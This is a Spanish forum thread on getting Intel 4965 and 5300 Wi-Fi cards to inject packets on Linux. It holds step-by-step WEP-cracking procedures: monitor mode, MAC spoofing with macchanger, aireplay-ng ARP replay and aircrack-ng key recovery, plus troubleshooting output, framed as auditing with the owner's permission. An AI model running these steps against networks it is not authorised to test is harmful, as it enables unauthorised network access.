Para tener exito en los ataques hay que plantearlos bien dependiendo de las condiciones.

El ataque planteado en la primera pagina es para una situacion con cliente conectado y sin seguridad por MAC.

Para inyectar primero tienes que conseguir recibir un ACK y sin clientes conectados pueden pasar  horas , dias o nunca. En este caso hay que plantear ataques combinados y probar (para esto hay mucha informacion en el foro y es independiente de la tarjeta utilizada )

Si hay seguridad por MAC tienes que conectarte con una MAC aceptada por tu router; si no no consigues asociar.

...

Saludos
[/quote                              Cita de pagina 7 en este post

No das datos de la situacion del ataque a tu router , por lo que no podemos ayudarte sinplague

Seguramente necesitas leer mas por el foro , para entender mejor lo que estas haciendo

Post Merge: 12-10-2009, 13:38 (Lunes)
Citar
lo que me parece raro es que al hacer el airmon-ng start wlan0 me aparece Driver iwlagn pero Chipset  UNKNOWN, puede ser? Es la versión 1.0 final de Wifiway...

Eso no tiene importancia ,funciona asi. Pero no has definido el canal de emision del router a auditar:

airmon-ng start wlan0 "canal_red_a_auditar"        por ej.: airmon-ng start wlan0 6

Un saludo
Título: Re: Inyectar con 4965
Publicado por: lobe en 17-10-2009, 17:59 (Sábado)
Buenas,

Siguiendo los pasos que indica cantinflas en su post he conseguido inyectar sin problemas. Solo lo he probado una vez así que on os puedo dar demasiados detalles pero en 10 minutos conseguí la contraseña.

Un Saludo!
Título: Re: Inyectar con 4965
Publicado por: jezu00 en 07-12-2009, 20:35 (Lunes)
Como va el tema con wpa  se ha avanzado en la captura de handshakes ???

https://foro.seguridadwireless.net/live-cd-wifiway-1-0-renovation-kde/wpa-con-4965/
Título: Re: Inyectar con 4965
Publicado por: CocoLeo3680 en 31-12-2009, 04:10 (Jueves)
Buenas a todos:


Sólo llevo dos días con esto y de momento me voy dando de cabezados. Os cuento a ver qué es lo que me ocurre.

Estoy usando una live desde USB que leo con VMware. He instalado wifiway 1.0 siguiendo los pasos de uno de los manuales del foro. Una vez instalado empiezo con los pasos que comentais, pero la primera en la frente. Al poner ifconfig wlan0 down me responde:

Código: [Seleccionar]
wlan0: unknown interface: No such service"
Con iwconfig me responde:

Código: [Seleccionar]
lo         no wireless extensions
eth1      no wireless extensions


¿Alguna sugerencia?


Gracias, un saludo.
Título: Re: Inyectar con 4965
Publicado por: desder en 08-01-2010, 11:53 (Viernes)
Hola perdona pero es que he seguido todos los pasos y nada, que no inyecta, me aparece lo siguiente:

Read XXXX packets (got 0 ARP requests and 0  ACKs), sent 0 packets...

Querría preguntarte si necesito algún driver especial o un parche o algo en concreto para conseguirlo, tengo ubuntu 9.10 2.31.17.

Gracias.

Modificado:

siento haber escrito este absurdo mensje, lo unico que se tiene que hacer es esperar, ami me tardo casi 11 minutos, pero llego a inyectar a 621 pps.

Gracias y perdon por las molestias
Título: Re: Inyectar con 4965
Publicado por: wuith en 15-01-2010, 17:14 (Viernes)
FUNCIONAAAAAA!!! Con la explicación de cantinflas (p.7) me ha funcionado ^^  >:( >:( >:(Gracias!
Título: Re: Inyectar con 4965
Publicado por: raspa1989 en 19-01-2010, 21:06 (Martes)
Hola gente! Soy nuevo en el foro  y me gusta mucho la informatica,aparte que estoy en un ciclo!. Me registrado porqe no aguanto mas, habre leido cada post 500 veces sobre la 4965agn de los co*****. Tengo 2 problemas,
decirles que tengo un Acer timeline 1810TZ con la 4965. Tengo ubuntu 9.10 instalado con windows 7, los driver me los detecta y se pone en mon0 y busca redes pero no inyecta, y bueno no me preocupo y me pase al wifiway.
Ahora el wifiway lo instalo y no me detecta los driver :( ! porqe ? se supone que los driver vienen ya metidos no ? tecleo iwconfig y me sale device uknown, y en ifconig solo loopack, ningun programa me funciona :(.

Alguien sabe porque no me la detecta ? perdonen pero enserio me leido cada post 3 veces a la gente reciniando se le arregla pero a mi no :(.
Título: Re: Inyectar con 4965
Publicado por: desder en 20-01-2010, 11:15 (Miércoles)
Bueno, bueno, pues aqui va mi tutorial de como lo consegui ( no es gran cosa pero espero que sirva):

1.-Pedir permiso, al propietario de la red si esta no es nuestra.

2.-airmon-ng start wlan0 ( yo no pongo el canal).

3.-airodump-ng mon0 ( lo hago para saber la mac, canal y nombre de la red que vamos a ''atacar'', otra cosa yo no paro el airodump, despues os explicare por que).

---Abrir nuevo terminal o solapa---

4.-ifconfig wlan0 down

5.-macchanger -m 00:11:22:33:44:55 wlan0 ( importante pero no es obligatorio hacerlo).

6-ifconfig wlan0 up ( está claro que si no queremos hacer el paso 5, tampoco debemos hacer el 4 y el 6)

7.-editar el wpa.conf poniendo los datos correspondientes.
   -wpa_supplicant -c/home/desder/wpa.conf -Dwext -iwlan0 ( la ruta se cambia por la que cada uno tenga, eso si debemos dejar el ''-c'' delante de la ruta).

---lo que os decía antes de no parar el airodump era por que cuando intento asociarme con el wpa_supplicant siempre me salia algo como ''asosiation driver failed'' asi que un dia se me olvido parar el airodump y vuala me salio lo de completedm eso si al parar el airodump despues de este paso se me desasociaba---

---Abrir nuevo terminal o solapa ( yo el wpa_supplicant lo dejo funcionando no tengo ninguna explicaion para esto pero el lo que hago)---

8-airodump-ng -w dexter-back -c channel mon0 ( yo lo de dexter-back lo cambio por el nombre de la red asi despues facil de reconocer cada captura para que red sirve)

---Abrir nuevo terminal o solapa---

9-aireplay-ng -3 -b mac ap -h 00:11:22:33:44:55 mon0 ( los que no hicieron los pasos 4, 5 y 6 lo de 00:11:22:33:44:55 lo cambien por su mac)(si os dice que no se que de que la mon0 esta en otro canal pues le volveis a dar hasta que en la que busque y la de la red coincidan).

10.-aircrack-ng *.cap
     -elegir la red
     -y si tenemos suficientes data pues:

                                            key found!!!


posdata: yo utilizo ubuntu 9.10 2.6.31-17-generic, el unico problema que a mi me surge es en el paso numero 9 al intentar inyectar hay veces que tarda unos 7-8 minutos y hay otras que 20-30 minutos y hay veces que despues de 2-3 horas aún no ha empezado a inyectar, si alguien me podria ayudar con esto lo agradecería.
Título: Re: Inyectar con 4965
Publicado por: raspa1989 en 20-01-2010, 15:58 (Miércoles)
JOlines pues yo uso el ubuntu 9.10 y la 4965 no inyecta ni insultandola, y luego el wifiway no me la detecta ...:S yo nose que pasa.. se supone que para la 4965 el wifiway te la detecta de manera automatica.

He encontrado esto, que es una parte de loqe trae wifiway final:

"Intel pro wireless 3945, ipwraw old, los primeros drivers para estos equipos que hemos mantenido, por defecto no se cargan, se debe usar lanzador.
Familia mac80211
La nueva generación de drivers, suite aircrack-ng adaptada a ellos, se trabajan con interfaces diferentes
Zydas zd1211rw-mac80211
Intel pro wireless iwlagn con firmware para las nuevas iwl4965 y iwl5×00.
Intel pro wireless iwl3945, son cargados por defecto"

¿Como cargo los driver de la 4965 los "iwl4965"?
Título: Re: Inyectar con 4965
Publicado por: desder en 21-01-2010, 12:38 (Jueves)
JOlines pues yo uso el ubuntu 9.10 y la 4965 no inyecta ni insultandola, y luego el wifiway no me la detecta ...:S yo nose que pasa.. se supone que para la 4965 el wifiway te la detecta de manera automatica.

He encontrado esto, que es una parte de loqe trae wifiway final:

"Intel pro wireless 3945, ipwraw old, los primeros drivers para estos equipos que hemos mantenido, por defecto no se cargan, se debe usar lanzador.
Familia mac80211
La nueva generación de drivers, suite aircrack-ng adaptada a ellos, se trabajan con interfaces diferentes
Zydas zd1211rw-mac80211
Intel pro wireless iwlagn con firmware para las nuevas iwl4965 y iwl5×00.
Intel pro wireless iwl3945, son cargados por defecto"

¿Como cargo los driver de la 4965 los "iwl4965"?


hola:

yo tambien lo probe con wifiway y la verdad es que me lleve una decepcion porque a mi nisiquiera se me encendia la lucecita del wifi, para tu caso si no recuerdo mal habia que cargar no se si los modulos o no se como se llamaban, era ir al menu y en la opcion de arriba del todo entras allí encontraras si no recuerdo mal chipsets y alli le das al ipw4965 y te lo cargarba.

 :'( siento explicarlo de esta manera pero es que el cd de wifiway ahora mismo no esta en mis manos cuando lo tenga editare este mensaje para explicarlo bien   ;) .
Título: Re: Inyectar con 4965
Publicado por: raspa1989 en 21-01-2010, 20:13 (Jueves)
Gracias tio por contestar, perop  en el wifi way 1.0 final que me descargado solo aparecen en "inicio/wifiway/chipset/"unas cuantas tarjetar como atheros, Intel chipset, y solo aparece la iwl3965, la iwl4965 o en su defecto iwlagn para la 4965 no aparece :S.

Es rarisimo le doy al boton del wifi y nada, no aparecen los driver por las carpetas y si tecleo iwconfig me pone "Lo no wireless", ni me aparece wlan0, si pongo ifconfig me aparece solo loopback 127.0.0.1 :S. Nose como la gente puede hacer rular esta tarjeta :S nose que mas hacer. Gracias por contestar.
Título: Re: Inyectar con 4965
Publicado por: dranlys en 21-01-2010, 21:28 (Jueves)
Bueno, tiempo que intento y aun no puedo salir de este problema, el wpa_supplicant.
Este es mi wpa_conf
Código: [Seleccionar]
network={
        ssid="zbdstudio"
        key_mgmt=NONE
        bssid=00:02:CF:BF:30:FC
        wep_key0="232323343478787"
}

Sin embargo se queda en el bucle siguiente
Código: [Seleccionar]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
Trying to associate with 00:02:cf:bf:30:fc (SSID='zbdstudio' freq=2437 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Association request to the driver failed
Associated with 00:00:00:00:00:00
CTRL-EVENT-CONNECTED - Connection to 00:00:00:00:00:00 completed (reauth) [id=0 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
^CCTRL-EVENT-TERMINATING - signal 2 received

Ya lo he dejado como dos horas y no llega a conectar.

He realizado los primeros pasos, como todos los tutoriales, a lo que tengo duda y que creo es como debo dejar mi wireless, si me desconecto de la red en la que estoy, o la dejo tal como esta.
Título: Re: Inyectar con 4965
Publicado por: raspa1989 en 22-01-2010, 08:59 (Viernes)
A mi me pasa lo mismo cuando intento asociarme a mi red WEP con un wpa_supplicant, me sale lo mismo que a ti y te digo que eso esta mal... no llega a asociarse, sin embargo si uso para asociarme un "aireplay-ng -1 30 -e (nombre de la red) -a (mac router) -h ( tu mac)  mon0 si se me asocia y me sale una carita feliz :-)" como esa, pero claro segun los expertos hay que usar el supplicant, y tampco me inyecta. En wifiway ni me la reconoce...
Título: Re: Inyectar con 4965
Publicado por: dranlys en 22-01-2010, 15:46 (Viernes)
Uhmm, ahh verdad otra ayuda .. weno segun pude ayer creo que porque estuvieron descargando un gran fichero, llegue a capturar 20000 #datos, pero al momento de capturar la contraseña me da lo siguiente:
Código: [Seleccionar]
root@Josue-PC:~# aircrack-ng jhoshua.cap
Opening jhoshua.cap
open failed: No such file or directory
Read 0 packets.

No networks found, exiting.


Quitting aircrack-ng...

alguien que sepa cual es el motivo, aclaro que el nombre esta bien y estoy en ubuntu 9.10
Título: Re: Inyectar con 4965
Publicado por: raspa1989 en 22-01-2010, 15:55 (Viernes)
Pero como solucionaste tu problema de asociacion?? me pasa lo mismo que a ti con el wpa_supplicant :S  :(
Título: Re: Inyectar con 4965
Publicado por: manel en 22-01-2010, 19:03 (Viernes)
Buenas

Uhmm, ahh verdad otra ayuda .. weno segun pude ayer creo que porque estuvieron descargando un gran fichero, llegue a capturar 20000 #datos, pero al momento de capturar la contraseña me da lo siguiente:
Código: [Seleccionar]
root@Josue-PC:~# aircrack-ng jhoshua.cap
Opening jhoshua.cap
open failed: No such file or directory
Read 0 packets.

No networks found, exiting.


Quitting aircrack-ng...

alguien que sepa cual es el motivo, aclaro que el nombre esta bien y estoy en ubuntu 9.10

Prueba:

        aircrack-ng jhoshua-01.cap

Cada vez que lanzas el airodump-ng ....  -w joshua ... se te crea un archivo llamado joshua-01.cap, si lo vueles a lanzar con el mismo nombre se creará el  joshua-02.cap, etc...

Si no sabes cual es escribe el comando así:

        aircrack-ng jhoshua*.cap

Te los abrirá todos

Suerte
Título: Re: Inyectar con 4965
Publicado por: raspa1989 en 24-01-2010, 17:16 (Domingo)
Bueno, tiempo que intento y aun no puedo salir de este problema, el wpa_supplicant.
Este es mi wpa_conf
Código: [Seleccionar]
network={
        ssid="zbdstudio"
        key_mgmt=NONE
        bssid=00:02:CF:BF:30:FC
        wep_key0="232323343478787"
}

Sin embargo se queda en el bucle siguiente
Código: [Seleccionar]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
Trying to associate with 00:02:cf:bf:30:fc (SSID='zbdstudio' freq=2437 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Association request to the driver failed
Associated with 00:00:00:00:00:00
CTRL-EVENT-CONNECTED - Connection to 00:00:00:00:00:00 completed (reauth) [id=0 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
^CCTRL-EVENT-TERMINATING - signal 2 received

Ya lo he dejado como dos horas y no llega a conectar.

He realizado los primeros pasos, como todos los tutoriales, a lo que tengo duda y que creo es como debo dejar mi wireless, si me desconecto de la red en la que estoy, o la dejo tal como esta.

A mi me pasa lo mismo :(, alguien sabe  porque ? :( uso ubuntu 9.10 nose si algo qe ver ..me reconoce la tarjeta y monitorea pero al asociarme me sale asi como el...
Título: Re: Inyectar con 4965
Publicado por: redrage en 24-01-2010, 17:51 (Domingo)
Mira que he hecho pruebas con un monton de chipset, pero este 4965 se me esta resistiendo.

Yo tambien tengo el error de "Disconnect Event - Remove Keys" con el WPA supplicant.

¿Seguimos sin saber a que se debe esto?
Título: Re: Inyectar con 4965
Publicado por: raspa1989 en 24-01-2010, 22:19 (Domingo)
Bueno queria decir que en ubuntu 9.10 sigo teniendo el problema de disconected keys y la mac en 00:00:00:00..., con wifiway 1.0 final ni me la detecta, actualice el kernel al 28 y tampoco me la detectaba.

Ya desesperado probe este wifiway:

http://foro.elhacker.net/wireless_en_linux/wifiway_10_final_con_entorno_lxde-t274129.0.html;msg1344647

y nose como pero me a detectado la 4965 a la primera sin persistant changes, mas que nada porque no tiene persistant changes, pero bueno por si a alguien le pasaba como a mi, prueben con ese que ese si que funciona. Tengo un acer timeline 1810TZ por si importa.

No e probado a inyectar todavia ni a asociarme, pero si monitoriza.

MODIFICADO

Pues e probado a usar la 4965 con airoscript usando wlan0 y mon0 y cuando sale la pantalla de asociacion con letras rojas no se asocia :S
Título: Re: Inyectar con 4965
Publicado por: raspa1989 en 01-02-2010, 19:40 (Lunes)
Bueno, tiempo que intento y aun no puedo salir de este problema, el wpa_supplicant.
Este es mi wpa_conf
Código: [Seleccionar]
network={
        ssid="zbdstudio"
        key_mgmt=NONE
        bssid=00:02:CF:BF:30:FC
        wep_key0="232323343478787"
}

Sin embargo se queda en el bucle siguiente
Código: [Seleccionar]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
Trying to associate with 00:02:cf:bf:30:fc (SSID='zbdstudio' freq=2437 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Association request to the driver failed
Associated with 00:00:00:00:00:00
CTRL-EVENT-CONNECTED - Connection to 00:00:00:00:00:00 completed (reauth) [id=0 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
^CCTRL-EVENT-TERMINATING - signal 2 received

Ya lo he dejado como dos horas y no llega a conectar.

He realizado los primeros pasos, como todos los tutoriales, a lo que tengo duda y que creo es como debo dejar mi wireless, si me desconecto de la red en la que estoy, o la dejo tal como esta.

A mi me pasa lo mismo :(, alguien sabe  porque ? :( uso ubuntu 9.10 nose si algo qe ver ..me reconoce la tarjeta y monitorea pero al asociarme me sale asi como el...

No sabe nadie porque es ese fallo de disconect event ?? :S

Post Merge: [time]lun 01 feb 2010 22:23:56 GMT-1[/time]
INYECCION 4965 AGN en Linux Ubuntu 9.10  claves WEP ( PROBADO 100% DEFINITIVO)


1.   iwlist wlan0 scan ( para  ver las redes sin iniciar airmon-ng ), debemos de fijarnos en los campos:
-  BSSID que es la mac de la red. aa:bb:cc:dd:ee     por ejemplo.
-   SSID que es el nombre de la red.
-   CHANNEL o C, lo apuntamos, es el canal que usa la red.
-   Si queremos usar macchanger para cambiar nuestra mac se hace asi :
Ifconfig  wlan0 down
Macchanger   -m  11:22:33:44:55  wlan 0 o poner los digitos que queramos.
Ifconfig   wlan0 up  (todos estos pasos con sudo delante si no somos root).
Yo este tutorial lo he hecho sin macchanger y me a funcionado.

2.   Abrimos una terminal nueva, tecleamos “sudo su” ponemos la contraseña y seremos root.
-   airmon-ng   start   wlan0 9    ( el numero 9 es el canal de mi red seleccionada, vosotros teneis que poner el canal de vuestra red, que hemos mirado con el comando anterior).
-   Se nos creara una interfaz nueva virtual llamada mon0, que lo podemos mirar con el comando “iwconfig”.
-   Aquí viene lo que hice y me funciono, teclee 3 veces más “airmon-ng start wlan0 9” y me creo 3 interfaces nuevas, llamadas mon0, mon1, mon2 y mon3.
-   Se quedaría wlan0, mon0, mon1, mon2 y mon3. ¿ Por qué hago esto? Porque  la tarjeta 4965 agn solo inyecta, asocia y monitorea con interfaces “mon”. No utilizo wlan0 para nada, solo para iwlist wlan0 scan.

3.   airodump-ng     –w  redes    –bssid aa:bb:cc:dd:ee    -c  9 mon0
-
   Utilizaremos mon0 para escanear la red seleccionada, -c es el canal que hemos apuntado,  -w es el nombre de los archivos que nos guardara en la carpeta  /home/nuestro usuario/, es decir nuestra carpeta personal.
-   -bbsid es la dirección MAC de el Router de la red que hemos seleccionado.

4.   Creamos en el escritorio un archivo de texto llamado wpa.conf con la estructura siguiente, debemos guardarlo, hay gente que lo deja abierto, yo no:
Network={
      ssid=”Nombre de la red”  ( va con comillas)
      key_mgmt=NONE
      bssid= aa:bb:cc:dd:ee   ( por ejemplo)
      wep_key0=”1234567890” ( con comillas)
}

5.   Abrimos una terminal nueva, tecleamos “sudo su” ponemos la contraseña y seremos root, nos asociamos con:


-   wpa_supplicant   -c/home/nuestro usuario/Escritorio/wpa.conf   -Dwext   –imon2
-   usamos la interfaz mon2 para que se asocie, y nos debe de mostrar este mensaje entre otros tantos como:
 CRTL-EVENT-CONECTED – Conecction  aa:bb:cc:dd:ee    completed (reauth) [id=0 id_str=]
( Si os sale una cosa como “CRTL-EVENT-DISCONNECTED- disconnect remove keys “ es porque no habeis usado una interfaz mon). Podeis usar la mon1, pero a mi no me funciona aunque este creada, asique uso mon2.  El  -imon2 no es una errata debemos poner  -i “interfaz mon” como pone ahí.

6.   Abrimos otra ventana o solapa y tecleamos sudo su como antes:
-   Aireplay-ng   -3  -b  aa:bb:cc:dd:ee   -h 11:22:33:44:55 mon3
Os explico,   -b es la mac del ruter e decir la bssid,  -h es nuestra mac de nuestra tarjeta, y la interfaz mon3. Yo no he usado macchanger porque es mi red y no me hacia falta.  Si quereis usar macchanger, debeis hacerlo después de iwlist wlan0 scan.
-   Este punto es crucial, debemos esperar a que inyecte, puede variar el tiempo.
-   Es favorable que haya alguien dentro de la red.
-   Hay ruter que no soportan esta inyección.
-   Con wifiway 1.0 final no he sido capaz de inciar la tarjeta no me la reconoce, con wifiway 1.0 KXDE creo que es… si me la reconoce pero el airoscript no se asocia, se me queda en open system todo el rato y la ventana acaba desapareciendo.


7.   Debemos asegurarnos que estamos asociados en la ventana de airodump, en las columnas:
Bssid, station, PWR, rate, lost, paquets, probes, debajo de estas columnas debe aparecer nuestra conexión con nuestra MAC y la mac del ruter.

8.   Cuando consiga inyectar y los datas suban debemos tener 300 000 o asi mas o menos, depende de la clave, pueden ser mas o menos.
9.   Teclear en otra ventana sudo su, y el comando: aircrack-ng   *.cap  y nos sacara la clave :D
-   Si teneis dudas sobre el proceso postear, me alegro de haber solucionado mi problema, la interfaz wlan0 que aparece en todos los tutoriales a mi no me funciona.
Título: Re: Inyectar con 4965
Publicado por: trini en 24-02-2010, 16:05 (Miércoles)
Buenas, soy novato e intentaba descifrar mi router pero no lo conseguía, un compañero del foro me aconsejo que con la tarjeta que yo tengo me pasara por este post; antes de ir probando a lo loco quisiera hacer una pregunta:
mi tarjeja es una Intel(R) Wireless WiFi Link 5300,
¿los pasos que aqui se describen sirven para mi tarjeta?

por favor, espero respuesta

un saludo y gracias



Post Merge: [time]jue 25 feb 2010 23:21:56 GMT-1[/time]
Bueno, tiempo que intento y aun no puedo salir de este problema, el wpa_supplicant.
Este es mi wpa_conf
Código: [Seleccionar]
network={
        ssid="zbdstudio"
        key_mgmt=NONE
        bssid=00:02:CF:BF:30:FC
        wep_key0="232323343478787"
}

Sin embargo se queda en el bucle siguiente
Código: [Seleccionar]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
Trying to associate with 00:02:cf:bf:30:fc (SSID='zbdstudio' freq=2437 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Association request to the driver failed
Associated with 00:00:00:00:00:00
CTRL-EVENT-CONNECTED - Connection to 00:00:00:00:00:00 completed (reauth) [id=0 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
^CCTRL-EVENT-TERMINATING - signal 2 received

Ya lo he dejado como dos horas y no llega a conectar.

He realizado los primeros pasos, como todos los tutoriales, a lo que tengo duda y que creo es como debo dejar mi wireless, si me desconecto de la red en la que estoy, o la dejo tal como esta.

A mi me pasa lo mismo :(, alguien sabe  porque ? :( uso ubuntu 9.10 nose si algo qe ver ..me reconoce la tarjeta y monitorea pero al asociarme me sale asi como el...

No sabe nadie porque es ese fallo de disconect event ?? :S

Post Merge: [time]lun 01 feb 2010 22:23:56 GMT-1[/time]
INYECCION 4965 AGN en Linux Ubuntu 9.10  claves WEP ( PROBADO 100% DEFINITIVO)


1.   iwlist wlan0 scan ( para  ver las redes sin iniciar airmon-ng ), debemos de fijarnos en los campos:
-  BSSID que es la mac de la red. aa:bb:cc:dd:ee     por ejemplo.
-   SSID que es el nombre de la red.
-   CHANNEL o C, lo apuntamos, es el canal que usa la red.
-   Si queremos usar macchanger para cambiar nuestra mac se hace asi :
Ifconfig  wlan0 down
Macchanger   -m  11:22:33:44:55  wlan 0 o poner los digitos que queramos.
Ifconfig   wlan0 up  (todos estos pasos con sudo delante si no somos root).
Yo este tutorial lo he hecho sin macchanger y me a funcionado.

2.   Abrimos una terminal nueva, tecleamos “sudo su” ponemos la contraseña y seremos root.
-   airmon-ng   start   wlan0 9    ( el numero 9 es el canal de mi red seleccionada, vosotros teneis que poner el canal de vuestra red, que hemos mirado con el comando anterior).
-   Se nos creara una interfaz nueva virtual llamada mon0, que lo podemos mirar con el comando “iwconfig”.
-   Aquí viene lo que hice y me funciono, teclee 3 veces más “airmon-ng start wlan0 9” y me creo 3 interfaces nuevas, llamadas mon0, mon1, mon2 y mon3.
-   Se quedaría wlan0, mon0, mon1, mon2 y mon3. ¿ Por qué hago esto? Porque  la tarjeta 4965 agn solo inyecta, asocia y monitorea con interfaces “mon”. No utilizo wlan0 para nada, solo para iwlist wlan0 scan.

3.   airodump-ng     –w  redes    –bssid aa:bb:cc:dd:ee    -c  9 mon0
-
   Utilizaremos mon0 para escanear la red seleccionada, -c es el canal que hemos apuntado,  -w es el nombre de los archivos que nos guardara en la carpeta  /home/nuestro usuario/, es decir nuestra carpeta personal.
-   -bbsid es la dirección MAC de el Router de la red que hemos seleccionado.

4.   Creamos en el escritorio un archivo de texto llamado wpa.conf con la estructura siguiente, debemos guardarlo, hay gente que lo deja abierto, yo no:
Network={
      ssid=”Nombre de la red”  ( va con comillas)
      key_mgmt=NONE
      bssid= aa:bb:cc:dd:ee   ( por ejemplo)
      wep_key0=”1234567890” ( con comillas)
}

5.   Abrimos una terminal nueva, tecleamos “sudo su” ponemos la contraseña y seremos root, nos asociamos con:


-   wpa_supplicant   -c/home/nuestro usuario/Escritorio/wpa.conf   -Dwext   –imon2
-   usamos la interfaz mon2 para que se asocie, y nos debe de mostrar este mensaje entre otros tantos como:
 CRTL-EVENT-CONECTED – Conecction  aa:bb:cc:dd:ee    completed (reauth) [id=0 id_str=]
( Si os sale una cosa como “CRTL-EVENT-DISCONNECTED- disconnect remove keys “ es porque no habeis usado una interfaz mon). Podeis usar la mon1, pero a mi no me funciona aunque este creada, asique uso mon2.  El  -imon2 no es una errata debemos poner  -i “interfaz mon” como pone ahí.

6.   Abrimos otra ventana o solapa y tecleamos sudo su como antes:
-   Aireplay-ng   -3  -b  aa:bb:cc:dd:ee   -h 11:22:33:44:55 mon3
Os explico,   -b es la mac del ruter e decir la bssid,  -h es nuestra mac de nuestra tarjeta, y la interfaz mon3. Yo no he usado macchanger porque es mi red y no me hacia falta.  Si quereis usar macchanger, debeis hacerlo después de iwlist wlan0 scan.
-   Este punto es crucial, debemos esperar a que inyecte, puede variar el tiempo.
-   Es favorable que haya alguien dentro de la red.
-   Hay ruter que no soportan esta inyección.
-   Con wifiway 1.0 final no he sido capaz de inciar la tarjeta no me la reconoce, con wifiway 1.0 KXDE creo que es… si me la reconoce pero el airoscript no se asocia, se me queda en open system todo el rato y la ventana acaba desapareciendo.


7.   Debemos asegurarnos que estamos asociados en la ventana de airodump, en las columnas:
Bssid, station, PWR, rate, lost, paquets, probes, debajo de estas columnas debe aparecer nuestra conexión con nuestra MAC y la mac del ruter.

8.   Cuando consiga inyectar y los datas suban debemos tener 300 000 o asi mas o menos, depende de la clave, pueden ser mas o menos.
9.   Teclear en otra ventana sudo su, y el comando: aircrack-ng   *.cap  y nos sacara la clave :D
-   Si teneis dudas sobre el proceso postear, me alegro de haber solucionado mi problema, la interfaz wlan0 que aparece en todos los tutoriales a mi no me funciona.

Gracias, me funciono. ;D ;D ;D >:( >:( >:(

Dejo aqui la prueba realizada:

mi tarjeta es una   Intel(R) Wireless WiFi Link 5300, y como con wifislax y wifiway estaba loco, segui la recomendacion del compañero chinitiw y me pase por este post. como no tenia ni idea de ubuntu, al principio me costo un poco instalarlo, ya que mi intencion era no tocar el portatil y decidi instalarlo en un lapiz de memoria de 8gb, tube que trastear un poco pero al final lo consegui. por cierto, este sistema operativo (sin a ver trasteado mucho), parece que esta muy bien.
 
voy al lio:
1º-coloco al router una clave de 64bits y a la primera con 50000 datas, bingo.
2º-configuro el router con clave de 128bits y tambien a la primera con 370000 datas, bingo

quiero hacer una tercera prueba con el router de mi vecino, pero asta mañana no podre pedirle permiso, asin que a esperar.

tambien tengo dos preguntas importantes, sobre todo la primera:

¿donde van los archivos de los datas?   ejpl: rede-01.cap; para poder borrarlos.

¿alguien me puede orientar cual es el post para las claves wap y wap2?, para tambien realizar pruebas.

todo esto con este manual y al 100%

gracias y un saludo

 Edito para aumentar datos:
prueba cambiando la mac a 00:11:22:33:44:55
no funciona, supongo por que habría que cambiar las mac con la que inyecta y la que asocia por que estas singuen con la mac original; he probado a cambiarla pero me da error(seguramente por que yo no se), asi que solo puedo inyectar con la mac original.
sigo todo el manual menos una sola cosa, el comamdo Ifconfig   wlan0 up, no lo ejecuto por que si lo pongo no se asocia.

SALUDOS


Título: Re: Inyectar con 4965
Publicado por: raspa1989 en 03-03-2010, 22:37 (Miércoles)
Me alegro que te haya funcionado, los *.cap estan en tu carpeta personal, para entrar pincha arriba en "lugares" y luego "carpeta personal" ahi tendras los cap. Lo de Ifconfig wlan0 up, es para levantar la tarjeta de red inalambrica con la mac cambiada por macchanger, pero sino usas macchanger saltate ese paso, yo no lo e pobado con macchanger pero creo que no funciona, a mi solo con la original.
Título: Re: Inyectar con 4965
Publicado por: trini en 05-03-2010, 15:35 (Viernes)
Me alegro que te haya funcionado, los *.cap estan en tu carpeta personal, para entrar pincha arriba en "lugares" y luego "carpeta personal" ahi tendras los cap. Lo de Ifconfig wlan0 up, es para levantar la tarjeta de red inalambrica con la mac cambiada por macchanger, pero sino usas macchanger saltate ese paso, yo no lo e pobado con macchanger pero creo que no funciona, a mi solo con la original.
gracias por contestar, el caso es que cuando tube ubuntu instalado la 1ª vez, si aparecian los achivos, pero desde que me dio el error y tube que reinstalarlo no me aparecen. a mi tampoco me funciona cambiando la mac, pero si tengo que hacer Ifconfig wlan0 down para que se asocie(aunque no cambie la mac) poque que si la dejo levantada no me asocia.

en definitiva:
1º-ahora no aparecen los archivos *.cap para poder borrarlos ( aunque cuando ejecuto aircrack-ng   *.cap si aparecen)
2º-yo forzosamente tengo que ejecutar Ifconfig wlan0 down pero no Ifconfig wlan0 up

saludos
Título: Re: Inyectar con 4965
Publicado por: chinitiw en 05-03-2010, 18:07 (Viernes)
buenas:

Seguramente , como debes de usar el comando sudo para algunas ordenes esas capturas estén en /root , pero para acceder a las mismas debes de ser root .

Yo lo haría así:

su -l

buscaría dentro de la carpeta root todos los .cap

find /root -name *.cap > todos.txt

así todos los almacenarás( las rutas de donde están) a ese fichero de texto , para tenerlos controlados , si lo quieres leer cat todos.txt | more

luego

rm -R *.cap

y andando

P.D. ojo que hace tiempo que no me pongo mucho con comandos de sistema y menos con ubuntu e igual te haces una canterita en ese pen de 8 Gb  ;D

P.D. 2 si he dicho una burrada (espero que no) , me lo corrijan

saludos
Título: Re: Inyectar con 4965
Publicado por: trini en 06-03-2010, 16:45 (Sábado)
buenas:

Seguramente , como debes de usar el comando sudo para algunas ordenes esas capturas estén en /root , pero para acceder a las mismas debes de ser root .

Yo lo haría así:

su -l

buscaría dentro de la carpeta root todos los .cap

find /root -name *.cap > todos.txt

así todos los almacenarás( las rutas de donde están) a ese fichero de texto , para tenerlos controlados , si lo quieres leer cat todos.txt | more

luego

rm -R *.cap

y andando

